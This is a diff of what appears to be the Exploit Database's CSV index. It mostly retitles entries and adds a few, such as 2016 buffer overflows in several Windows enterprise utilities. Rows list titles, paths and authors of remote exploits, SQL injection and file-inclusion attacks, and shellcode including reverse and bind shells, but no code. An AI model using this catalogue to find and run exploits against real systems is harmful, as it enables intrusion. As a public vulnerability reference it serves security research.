18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote,0
18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0
18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0
@ -15023,6 +15030,7 @@ id,file,description,date,author,platform,type,port
40113,platforms/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (1)",2016-07-18,"Eddie Harari",linux,remote,22
40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
40846,platforms/android/remote/40846.html,"Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0
40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration (2)",2016-07-20,0_o,linux,remote,22
@ -15098,6 +15106,12 @@ id,file,description,date,author,platform,type,port
40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15553,7 +15567,7 @@ id,file,description,date,author,platform,type,port
40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (25 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
@ -15934,7 +15948,7 @@ id,file,description,date,author,platform,type,port
1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0
1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0
1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0
1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0
1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0
@ -16201,7 +16215,7 @@ id,file,description,date,author,platform,type,port
1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0
1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0
1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0
1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0
1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0
1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0
@ -16736,7 +16750,7 @@ id,file,description,date,author,platform,type,port
2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0
2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0
2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Inclusion",2006-10-24,Kacper,php,webapps,0
2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0
2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0
2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0
2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0
2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution",2006-10-24,BlackHawk,php,webapps,0
@ -16796,13 +16810,13 @@ id,file,description,date,author,platform,type,port
2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0
2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0
2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0
2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0
2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0
2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0
2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0
2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Inclusion",2006-11-05,Kacper,php,webapps,0
2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0
2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - (av) Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0
@ -16873,7 +16887,7 @@ id,file,description,date,author,platform,type,port
2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0
2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0
2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0
2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - (index.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0
2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0
@ -17236,7 +17250,7 @@ id,file,description,date,author,platform,type,port
3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0
3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0
3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0
3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0
3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,php,webapps,0
3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) SQL Injection",2007-03-04,ajann,php,webapps,0
3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0
3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection",2007-03-05,ajann,php,webapps,0
@ -17510,7 +17524,7 @@ id,file,description,date,author,platform,type,port
3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0
3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - (debug_show.php) SQL Injection",2007-05-04,rgod,php,webapps,0
3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,php,webapps,0
3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0
3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0
3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
@ -17835,7 +17849,7 @@ id,file,description,date,author,platform,type,port
4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0
4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0
4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0
4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' Parameter SQL Injection",2007-09-19,str0ke,php,webapps,0
4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0
4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0
4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0
@ -17995,7 +18009,7 @@ id,file,description,date,author,platform,type,port
4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0
4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0
4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0
4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0
4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0
@ -18648,39 +18662,39 @@ id,file,description,date,author,platform,type,port
5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0
5550,platforms/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0
5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0
5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps,0
5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0
5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0
5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection",2008-05-06,InjEctOr5,php,webapps,0
5553,platforms/asp/webapps/5553.txt,"FipsCMS 2.1 - 'print.asp' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - 'cat' Parameter SQL Injection",2008-05-07,cOndemned,php,webapps,0
5555,platforms/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection",2008-05-07,InjEctOr5,php,webapps,0
5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0
5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0
5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0
5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0
5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0
5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - (msg_image) SQL Injection",2008-05-08,The:Paradox,php,webapps,0
5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' Parameter SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0
5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection",2008-05-08,The:Paradox,php,webapps,0
5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,asp,webapps,0
5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - (tid) SQL Injection",2008-05-08,Saime,php,webapps,0
5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection",2008-05-08,Saime,php,webapps,0
5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0
5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0
5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0
5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection",2008-05-09,JosS,php,webapps,0
5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' Parameter SQL Injection",2008-05-09,JosS,php,webapps,0
5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0
5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0
5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,php,webapps,0
5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps,0
5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0
5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection",2008-05-09,Mr.SQL,php,webapps,0
5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps,0
5582,platforms/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps,0
5583,platforms/php/webapps/5583.php,"Joomla! Component com_datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0
5583,platforms/php/webapps/5583.php,"Joomla! Component Datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0
5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion",2008-05-11,CraCkEr,php,webapps,0
5587,platforms/php/webapps/5587.pl,"Joomla! Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps,0
5588,platforms/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injections Vulnerabilities",2008-05-11,Lidloses_Auge,php,webapps,0
5589,platforms/php/webapps/5589.php,"Vortex CMS - 'index.php pageid' Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0
5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5589,platforms/php/webapps/5589.php,"Vortex CMS - 'pageid' Parameter Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0
5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - 'featured_article.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0
5595,platforms/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0
5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
@ -18748,7 +18762,7 @@ id,file,description,date,author,platform,type,port
5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps,0
5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0
5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0
5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - (install_mod.php) Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) SQL Injection",2008-05-24,His0k4,php,webapps,0
5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0
5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0
@ -18912,8 +18926,8 @@ id,file,description,date,author,platform,type,port
5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0
5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) SQL Injection",2008-06-19,anonymous,php,webapps,0
5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0
5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0
5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0
5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0
5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0
5869,platforms/php/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
@ -19135,7 +19149,7 @@ id,file,description,date,author,platform,type,port
6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0
6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0
6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - (r) SQL Injection",2008-07-26,U238,asp,webapps,0
6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0
6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0
@ -19425,7 +19439,7 @@ id,file,description,date,author,platform,type,port
6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0
6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0
6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0
6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection",2008-09-24,GoLd_M,php,webapps,0
6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection",2008-09-24,GoLd_M,php,webapps,0
6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0
6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0
6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0
